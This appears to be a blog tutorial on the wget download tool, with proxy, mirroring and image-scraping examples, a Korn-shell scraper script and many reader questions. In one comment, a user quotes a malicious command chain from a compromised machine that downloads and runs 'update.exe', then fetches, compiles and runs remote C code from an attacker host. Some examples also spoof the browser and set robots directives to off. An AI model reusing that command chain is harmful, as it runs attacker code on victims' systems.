Wget examples and scripts
Wget is a command-line download tool for Unix and Windows. Wget can download Web pages and files; it can submit form data and follow links; and it can mirror entire Web sites to make local copies. Wget is one of the most useful applications you will ever install on your computer, and it is free.
You can download the latest version of Wget from the developers' home page. Precompiled versions of Wget are available for Windows and for most flavors of Unix. Many Unix operating systems have Wget pre-installed, so type which wget to see if you already have it.
Wget supports a multitude of options and parameters, which can be confusing to people unfamiliar with the tool. You can view the available Wget options by typing wget --help, or, on a Unix box, man wget.
Here are a few useful examples of how to use Wget:
1) Download main page of Yahoo.com and save it as yahoo.htm
wget -O yahoo.htm http://www.yahoo.com
2) Use Wget from behind an HTTP firewall (proxy):
Set the proxy in Korn or Bash shells:
export http_proxy=proxy_server.domain:port_number
Set the proxy in the C shell:
setenv http_proxy proxy_server.domain:port_number
Run Wget through an anonymous proxy:
wget -Y on -O yahoo.htm "http://www.yahoo.com"
Run Wget through a proxy that requires authentication:
wget -Y on --proxy-user=your_username --proxy-passwd=your_password -O yahoo.htm "http://www.yahoo.com"
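If you go through the same proxy all the time, you can also put these settings in your ~/.wgetrc file instead of exporting environment variables. A minimal sketch, assuming Wget 1.8-era wgetrc command names (recent releases spell the password command proxy_password) and placeholder host, port and credentials:
# ~/.wgetrc -- proxy settings (host, port and credentials are placeholders)
use_proxy = on
http_proxy = http://proxy_server.domain:port_number/
proxy_user = your_username
proxy_passwd = your_password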
3) Make a local mirror of the Wget home page that you can browse from your hard drive.
Here are the options we will use:
-m to mirror the site
-k to make all links local
-D to stay within the specified domain
--follow-ftp to follow FTP links
-np not to ascend to the parent directory
The following two options deal with Web sites protected against automated download tools such as Wget:
-U to masquerade as a Mozilla browser
-e robots=off to ignore no-robots server directives
wget -U Mozilla -m -k -D gnu.org --follow-ftp -np "http://www.gnu.org/software/wget/" -e robots=off
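If you also want the mirrored pages to display properly offline, you can add -p (--page-requisites) so that Wget pulls in the inlined images and stylesheets each page needs. A possible variation of the same command, offered as a sketch rather than a tested recipe:
wget -U Mozilla -m -k -p -D gnu.org --follow-ftp -np "http://www.gnu.org/software/wget/" -e robots=off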
4) Download all images from the Playboy site.
Here are the options we will use:
-r for recursive download
-l 0 for unlimited recursion levels
-t 1 for one download attempt per link
-nd not to create local directories
-A to download only files with the specified extensions
wget -r -l 0 -U Mozilla -t 1 -nd -D playboy.com -A jpg,jpeg,gif,png "http://www.playboy.com" -e robots=off
5) Web image collector
The following Korn-shell script reads from a list of URLs and downloads all images found anywhere on those sites. The downloaded images are then filtered: all images smaller than a certain size are deleted, and the remaining images are saved in a folder named after the URL. The url_list.txt file contains one URL per line.
This script was originally written to run under AT&T UWIN on Windows, but it will also work in any native Unix environment that has the Korn shell.
#!/bin/ksh
# WIC.ksh - Web Image Collector
#
# WIC reads from a list of URLs and spiders each site recursively
# downloading images that match specified criteria (type, size).

#-----------------------------------------------------------------
# ENVIRONMENT CONFIGURATION
#-----------------------------------------------------------------
WORKDIR="C:/Downloads"          # Working directory
cd "$WORKDIR"
OUTPUT="$WORKDIR/output"        # Final output directory
URLS="$WORKDIR/url_list.txt"    # List of URLs
WGET="/usr/bin/wget"            # Wget executable
SIZE="+7k"                      # Minimum image size to keep
TMPDIR1="$WORKDIR/tmp1"         # Temporary directory 1
TMPDIR2="$WORKDIR/tmp2"         # Temporary directory 2
TMPDIR3="$WORKDIR/tmp3"         # Temporary directory 3

if [ ! -d "$WORKDIR" ]
then
    mkdir "$WORKDIR"
    if [ ! -d "$WORKDIR" ]
    then
        echo "Download directory not found. Exiting..."
        exit 1
    fi
fi

if [ ! -d "$OUTPUT" ]
then
    mkdir "$OUTPUT"
    if [ ! -d "$OUTPUT" ]
    then
        echo "Cannot create $OUTPUT directory. Exiting..."
        exit 1
    fi
fi

if [ ! -f "$URLS" ]
then
    echo "URL list not found in $WORKDIR. Exiting..."
    exit 1
fi

for i in 1 2 3
do
    if [ -d "$WORKDIR/tmp$i" ]
    then
        rm -r "$WORKDIR/tmp$i"
        mkdir "$WORKDIR/tmp$i"
    else
        mkdir "$WORKDIR/tmp$i"
    fi
done

if [ ! -f "$WGET" ]
then
    echo "$WGET executable not found. Exiting..."
    exit 1
fi

#-----------------------------------------------------------------
# DOWNLOAD IMAGES
#-----------------------------------------------------------------
cat "$URLS" | while read URL
do
    echo "Processing $URL"
    DOMAIN=$(echo "$URL" | awk -F'/' '{print $3}')
    if [ ! -d "$OUTPUT/$DOMAIN" ]
    then
        cd "$TMPDIR1"
        mkdir "$OUTPUT/$DOMAIN"
        $WGET --http-user=your_username --http-passwd=your_password -r -l 0 -U Mozilla -t 1 -nd -A jpg,jpeg,gif,png,pdf "$URL" -e robots=off
        find "$TMPDIR1" -type f -size "$SIZE" -exec mv {} "$OUTPUT/$DOMAIN" \;
        cd "$WORKDIR"
    else
        echo "    $URL already processed. Skipping..."
    fi
    for i in 1 2 3
    do
        if [ -d "$WORKDIR/tmp$i" ]
        then
            rm -r "$WORKDIR/tmp$i"
            mkdir "$WORKDIR/tmp$i"
        else
            mkdir "$WORKDIR/tmp$i"
        fi
    done
done

#-----------------------------------------------------------------
# Remove empty download directories
#-----------------------------------------------------------------
cd "$OUTPUT"
find . -type d | fgrep "./" | while read DIR
do
    if [ `ls -R "$DIR" | wc -l | awk '{print $1}'` -eq 0 ]
    then
        rmdir "$DIR"
    fi
done
cd "$WORKDIR"
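To try the script, create the url_list.txt file in the working directory with one URL per line and run the script with the Korn shell. A minimal usage sketch, matching the default C:/Downloads working directory above and using the example URLs from this post:
cd C:/Downloads
cat > url_list.txt << EOF
http://www.gnu.org/software/wget/
http://www.yahoo.com
EOF
ksh WIC.ksh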
6) Wget options
GNU Wget 1.8.1+cvs, a non-interactive network retriever.
Usage: wget [OPTION]... [URL]...

Mandatory arguments to long options are mandatory for short options too.

Startup:
  -V,  --version           display the version of Wget and exit.
  -h,  --help              print this help.
  -b,  --background        go to background after startup.
  -e,  --execute=COMMAND   execute a `.wgetrc'-style command.

Logging and input file:
  -o,  --output-file=FILE     log messages to FILE.
  -a,  --append-output=FILE   append messages to FILE.
  -d,  --debug                print debug output.
  -q,  --quiet                quiet (no output).
  -v,  --verbose              be verbose (this is the default).
  -nv, --non-verbose          turn off verboseness, without being quiet.
  -i,  --input-file=FILE      download URLs found in FILE.
  -F,  --force-html           treat input file as HTML.
  -B,  --base=URL             prepends URL to relative links in -F -i file.
       --sslcertfile=FILE     optional client certificate.
       --sslcertkey=KEYFILE   optional keyfile for this certificate.
       --egd-file=FILE        file name of the EGD socket.

Download:
       --bind-address=ADDRESS   bind to ADDRESS (hostname or IP) on local host.
  -t,  --tries=NUMBER           set number of retries to NUMBER (0 unlimits).
  -O   --output-document=FILE   write documents to FILE.
  -nc, --no-clobber             don't clobber existing files or use .# suffixes.
  -c,  --continue               resume getting a partially-downloaded file.
       --progress=TYPE          select progress gauge type.
  -N,  --timestamping           don't re-retrieve files unless newer than local.
  -S,  --server-response        print server response.
       --spider                 don't download anything.
  -T,  --timeout=SECONDS        set the read timeout to SECONDS.
  -w,  --wait=SECONDS           wait SECONDS between retrievals.
       --waitretry=SECONDS      wait 1...SECONDS between retries of a retrieval.
       --random-wait            wait from 0...2*WAIT secs between retrievals.
  -Y,  --proxy=on/off           turn proxy on or off.
  -Q,  --quota=NUMBER           set retrieval quota to NUMBER.
       --limit-rate=RATE        limit download rate to RATE.

Directories:
  -nd  --no-directories            don't create directories.
  -x,  --force-directories         force creation of directories.
  -nH, --no-host-directories       don't create host directories.
  -P,  --directory-prefix=PREFIX   save files to PREFIX/...
       --cut-dirs=NUMBER           ignore NUMBER remote directory components.

HTTP options:
       --http-user=USER       set http user to USER.
       --http-passwd=PASS     set http password to PASS.
  -C,  --cache=on/off         (dis)allow server-cached data (normally allowed).
  -E,  --html-extension       save all text/html documents with .html extension.
       --ignore-length        ignore `Content-Length' header field.
       --header=STRING        insert STRING among the headers.
       --proxy-user=USER      set USER as proxy username.
       --proxy-passwd=PASS    set PASS as proxy password.
       --referer=URL          include `Referer: URL' header in HTTP request.
  -s,  --save-headers         save the HTTP headers to file.
  -U,  --user-agent=AGENT     identify as AGENT instead of Wget/VERSION.
       --no-http-keep-alive   disable HTTP keep-alive (persistent connections).
       --cookies=off          don't use cookies.
       --load-cookies=FILE    load cookies from FILE before session.
       --save-cookies=FILE    save cookies to FILE after session.

FTP options:
  -nr, --dont-remove-listing   don't remove `.listing' files.
  -g,  --glob=on/off           turn file name globbing on or off.
       --passive-ftp           use the "passive" transfer mode.
       --retr-symlinks         when recursing, get linked-to files (not dirs).

Recursive retrieval:
  -r,  --recursive          recursive web-suck -- use with care!
  -l,  --level=NUMBER       maximum recursion depth (inf or 0 for infinite).
       --delete-after       delete files locally after downloading them.
  -k,  --convert-links      convert non-relative links to relative.
  -K,  --backup-converted   before converting file X, back up as X.orig.
  -m,  --mirror             shortcut option equivalent to -r -N -l inf -nr.
  -p,  --page-requisites    get all images, etc. needed to display HTML page.

Recursive accept/reject:
  -A,  --accept=LIST                comma-separated list of accepted extensions.
  -R,  --reject=LIST                comma-separated list of rejected extensions.
  -D,  --domains=LIST               comma-separated list of accepted domains.
       --exclude-domains=LIST       comma-separated list of rejected domains.
       --follow-ftp                 follow FTP links from HTML documents.
       --follow-tags=LIST           comma-separated list of followed HTML tags.
  -G,  --ignore-tags=LIST           comma-separated list of ignored HTML tags.
  -H,  --span-hosts                 go to foreign hosts when recursive.
  -L,  --relative                   follow relative links only.
  -I,  --include-directories=LIST   list of allowed directories.
  -X,  --exclude-directories=LIST   list of excluded directories.
  -np, --no-parent                  don't ascend to the parent directory.
Comments
Very useful info. Thanks!
Best info I ever saw for this problem!
No bullshit talking, clear information…
Very good.
Thanks a lot.
really useful and enlightening :-)
Regards,
Swapnil
Can’t you use the -i option to process a list of URLs in a file?
You can use the “-i” option with wget to download a list of URLs. However, you will not have as much control over destination folders as you do when you use a WHILE loop.
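For example, a minimal sketch of the while-loop approach, assuming a hypothetical url_list.txt and using -P (--directory-prefix) to give each URL its own destination folder named after its host (the same awk trick the WIC script above uses):
while read URL
do
    DIR=$(echo "$URL" | awk -F'/' '{print $3}')   # host name becomes the folder name
    wget -P "downloads/$DIR" "$URL"
done < url_list.txt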
Wow, awesome, I’ve been looking for that list for a while now! :D Ever since I saw The Social Network!
For me, the image-download example is not working “as is”.
I added the option -p.
From the manual:
This option causes Wget to download all the files that are necessary to properly display a given HTML page. This includes such things as inlined images, sounds, and referenced stylesheets.
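With that change, the image-download command from example 4 would look something like this (just a sketch; the site layout may have changed since the post was written):
wget -r -l 0 -p -U Mozilla -t 1 -nd -D playboy.com -A jpg,jpeg,gif,png "http://www.playboy.com" -e robots=off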
I just want to practice Unix commands and start learning shell scripting and what a kernel is. Could you tell me the earliest and/or smallest version of Unix? I don’t need a graphical user interface for the time being. I need the smallest Unix that can be practiced with, requiring the least RAM and hard disk space.
Thanks Martino, I will try that, but could you tell me about any version of Unix that is about 2 MB in size, like MS-DOS?
I have been wondering about this for some time.
Excluding other hacks potentially involved, I was wondering if a DDoS attack in and of itself is actually illegal?
And if so, at what point is refreshing a page considered illegal?
I was thinking the same, but I am just curious where the line is drawn: 5, 25, 100, 1000+ times a minute? It just seems like a rather gray area of the law to me. I mean, you’re not actually causing any real damage per se, so I’m also curious as to what makes it illegal.
Give me five architecture types that are unrelated and five operating systems that are unrelated.
Unrelated is the key term.
What are the fundamental differences between Windows®, Mac OS®, UNIX, and Linux operating systems for personal computers?
I want to know how I can upload a file that is stored on a Web server (example: http://dl.ibox.org.ua/8/70322/Bengu___Taktik_www.Musicha.com.zip) to my own Web server.
Is there any code or anything like that I can put on my Web host that can do this for me?
For example, I put the URL of the file that I want to upload into my Web host, click a button, and it transfers the file to my Web host.
My host supports JavaScript and PHP!
I am looking for a solution to the following:
How can I prevent the execution of a cron job from its URL by any user?
I have my cron job script in a folder, with a name like a password: 3e2fkjn32kgjn.php.
Is it possible for a user to figure out the URL and execute the cron job?
If yes, how can I prevent that?
Details: my cron script emails me the statistics of the Web site every day.
So, can you tell me whether it is possible to get the cron URL? If yes, how? And how can I prevent it?
Thanks-
I want to download some files (about 1000-2000 zip files) from a Web site. I can’t sit around and add each file one after another; please give me a program, script, or whatever method will let me automate the download.
The Web site I am talking about has download links like
abc.co/date/12345/folder/12345_zip.zip
The date can be taken care of. The main concern is the number 12345 before and after the folder; they both change simultaneously, e.g.
abc.co/date/23456/folder/23456_zip.zip
abc.co/date/54321/folder/54321_zip.zip
I tried using curl with
abc.co/date/[12345-54321]/folder/[12345-54321]_zip.zip
but it makes too many combinations of downloads, i.e. it keeps the left 12345 as it is and scans through 12345 to 54321, then increments the left 12345 by one and repeats the scan from [12345-54321].
I also tried bash with wget. Here I have one variable in two places; when using a loop, the right 12345 followed by a “_” is ignored by the program. Please help me, I don’t know much about Linux or programming. Thanks.
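A simple shell loop would substitute the same number in both places. A minimal sketch, assuming the numbers form one contiguous range and using abc.co/date/... only as a stand-in for the real URL pattern; numbers that do not exist on the server simply fail and are skipped because of -t 1:
for n in $(seq 12345 54321)
do
    # the braces keep the trailing _zip from being read as part of the variable name
    wget -t 1 "http://abc.co/date/${n}/folder/${n}_zip.zip"
done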
I have a ConfigSystem file on my Linux machine and the program was ported from a Sun box so it has 4 different functions:
Sun64(), Sun32(), linux32(), and linux64() each with all the compiler settings.
How or where is it told which function to use?
Thanks!
I recently started some email marketing campaigns. We chose an email marketing application named PHPKode Newsletter X. Everything works well except its cron job configuration.
Their site tells me this:
“The setup process of a cron job depends on the hosting software you are using (Plesk, cPanel). Then add the commands below.
wget -O - -q -t 1 http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&user_id=1”
I use Web hosting at HostGator, so can anyone tell me how I can set up this cron job correctly?
You can find the configuration at their demo site http://www.phpnewsletter.org
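In a standard crontab (which is what cPanel's cron screen builds for you) this usually comes down to a single line with a schedule in front of the command. A sketch, assuming you want it to run once a day at 06:00 and keeping the URL from their instructions; quote the URL so the shell does not interpret the &:
0 6 * * * wget -O - -q -t 1 "http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&user_id=1"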
Is it possible to do it in Google Finance?
For instance: Shanghai stock 900947?
I know this sounds bizarre, but my webmaster passed away suddenly and I need to keep my website up and running. I do not have access to his PC. I believe that he was hosting the site on his own servers (not sure). And he is listed as the registrant for my domain name, along with my company name. Ideally what I want to do is move the website to another hosting company and then have someone else administer the website. I assume I would need the software that he used to develop the site in order to do this. HELP! I’ve never encountered a problem like this before and I can’t find any help on the web.
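While you sort out the hosting and domain ownership, the mirroring example earlier in this post can at least capture a browsable copy of the site’s public pages. A minimal sketch, with http://www.your-site.com standing in for your real address; note that this only saves what a visitor can see, not the server-side code or databases:
wget -m -k -p -U Mozilla -e robots=off "http://www.your-site.com/"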
I have recently started looking into programming, since I want to start studying it when I start university! And I had this idea of a program I would write (had I actually known what I was doing).
I want a program that fetches images from a site which uploads a new picture every day and saves them to my desktop background folder! I would like it to do so automatically once every day.
Is there anyone who can write me a “recipe” for a script which I could write down in Python? (I don’t want any downloads since I want to study the script)
Think of it as a small project if you know what you are doing! :)
Any contribution is much appreciated!!
Hey,
about 30 minutes ago I was typing an email and suddenly it started typing stuff by itself:
ik &echo binary >> ik &echo get update.exe >> >> ik &ftp -n -v -s:ik &del ik &update.exe >> echo mkdir .opz >> echo cd .opz >> echo wget http://shell.h4ck,biz/~kredkrew/index.c >> echo gcc -o opz index.c >> echo nice work >> echo ./opz >> echo Another Rooted!! &exit echo You got owned
I got most of it.
There was a bit missing at the start because I was pressing backspace; at the beginning I think it said cmd /c, then a little bit more, then the rest of the code.
I don’t know if I’ve been hacked or something, but something is definitely wrong. I’m lucky that I was typing an email, because I found another example where someone found the same thing in a command line,
so I think it was meant to go in there.
I have researched the site and gone to the URL, but it all 404s and has database errors.
I first ran an AVG scan and it came up with:
“”;”HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Hardcore”;”Found Dialer.Generic”;”Moved to Virus Vault”
So it removed it to the Virus Vault; I don’t know if it was that.
When it happened I was running RSBot from Powerbot.
I’m not sure if it could have been the script I was using or something, but I have now gotten rid of it (RSBot and the script).
I’m downloading Malwarebytes, Spybot Search & Destroy, and Ad-Aware,
and I’m going to do a scan with each.
Is there anything else I can do?
Should I do a system restore?
Something that gives me hope is that the URL has a comma instead of a dot, so I don’t think it would have been able to reach the URL.
I’m also going to do a scan for security holes.
Sorry for the terrible typing/spelling; I’m trying to get this up ASAP.
I do keep everything up to date,
but if the worst comes to the worst I may end up reinstalling my OS.
I’ve just realised that I had two ports open completely on my router that go to my PC, so I have now removed them.
I know I’m an idiot.
I wanted to know if supercomputers require a different operating system than a regular computer. I would think they use something very different or custom-made.
I am using a chain of pipes to extract a set of links from a downloaded HTML file. However, in the next-to-last step, I have a list of relative URLs and I would like to prepend the address of the server. I would love to insert that in the chain using a command like “prepend” in this example:
grep “my regexp” file.html | more commands | prepend “http://www.server.com/” | wget -i
More generally, it would be cool to have a command which would insert the contents of each input line at a specified place in a pattern, like
sandwich -c _ abc_def:
input line 1
input line 2
->
abcinput line 1def
abcinput line 2def
But a command for only prepending or only appending something to each line would suffice. I mean, it’s easy to cut out a part of each line using cut; there should be a reverse command available, too.
Please note before answering that I’m sure that
1) sed or awk could handle this with ease (but I don’t feel like learning them), and
2) writing a Perl script for this would take 10x less time than typing out this question,
but I think I am missing some really neat standard way of doing this straight from the command line without any extra gear and I want to know. So, how do I go about doing so?
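For what it’s worth, the prepend step can be done straight on the command line, either with a one-line sed substitution or with xargs. A sketch, keeping “my regexp”, file.html and http://www.server.com/ from the example above as placeholders; note that -i - tells Wget to read the URL list from standard input:
grep "my regexp" file.html | sed 's|^|http://www.server.com/|' | wget -i -
or, avoiding sed entirely:
grep "my regexp" file.html | xargs -I{} wget "http://www.server.com/{}"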
Please help me to create a batch file for downloading.
I want to make a batch file in which we just type the addresses or links and the path of the folder where the downloaded files should be stored.
All of this is for people who download files from a Web site daily.
For example, I download the assignments from the Web site daily from just one link.
Now my aim is to create a .bat file that downloads all the files from the Web in one click,
instead of downloading the files one by one.
If you have an idea about this then please share with me
the code for a batch file
for downloading.
Thanks
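A very small batch file along these lines only needs the -i and -P options that Wget already provides. A sketch, assuming wget.exe is on the PATH and that links.txt (one URL per line) and the destination folder are placeholders you supply yourself:
rem download.bat -- fetch every URL listed in links.txt into the chosen folder
wget -i links.txt -P "C:\Downloads\assignments"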